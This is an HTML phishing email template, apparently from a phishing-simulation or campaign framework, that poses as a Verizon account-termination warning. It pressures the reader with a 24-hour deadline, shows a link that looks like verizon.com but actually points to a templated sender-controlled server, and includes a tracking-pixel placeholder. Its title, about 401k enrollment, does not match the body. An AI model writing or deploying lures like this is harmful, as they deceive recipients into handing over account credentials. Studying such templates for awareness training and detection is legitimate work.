<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Urgent 401k Enrollment Information!</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <style type="text/css">
    /* email client bugfixes */
   .ExternalClass {width:100%;}
   .ExternalClass, .ExternalClass p, .ExternalClass span, .ExternalClass font, .ExternalClass td, .ExternalClass div {line-height: 100%;}
   body {-webkit-text-size-adjust:none; -ms-text-size-adjust:none;}
   body {margin:0; padding:0;}
   table td {border-collapse:collapse;}
   /* end email client bugfixes */
   /* reset defaults, overwrite styling inline */
   p {margin:0; padding:0; margin-bottom:0;}
   h1, h2, h3, h4, h5, h6 {color: black !important; line-height: 100%;}
   a, a:link {color: #2A5DB0; text-decoration: underline;}
   /* end reset defaults */
   /* optmize for mobile devices */
   /* phones */
   @media only screen and (max-device-width: 480px) {
     body[yahoo] #container1 {display:block !important}
     body[yahoo] p {font-size: 10px}
    }
    /* tablets */
    @media only screen and (min-device-width: 768px) and (max-device-width: 1024px)  {
      body[yahoo] #container1 {display:block !important}
      body[yahoo] p {font-size: 12px}
    }
   /* end optmize for mobile devices */
   img {outline:none; text-decoration:none; -ms-interpolation-mode: bicubic;}
     a img {border:none;}
     .image_fix {display:block;}
  </style>
</head>
<body style="background:#fff; min-height:1000px; color:#000;font-family:Arial, Helvetica, sans-serif; font-size:12px" alink="#0B0080" link="#0B0080" bgcolor="#ffffff" text="#000000" yahoo="fix">
  <div id="body_style" style="padding:15px">
    <!-- formatted paragraph example-->
   <p style="margin-top:0"></p>
   <!-- floating embedded image example -->
   <br />
   <br />
   Dear Verizon User,
   <br />
   <br />
   We received a request to terminate your Verizon account, please be<br  />
   informed that termination of your account will commence after 24hrs<br />
   without receiving any validation.<br />
   <br />
   To stop the termination of your account follow the link below:<br />
   <br />
  <a href="{{ url.webserver}}" style="color:#0B0080" target ="_blank" title="Account Validation">https://www.verizon.com/home/myverion</a> and re-validate your Verizon<br />
  account to stay Safe and Connected.
 </div>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
<br/>
{{ tracking_dot_image_tag }}
</body>
</html>
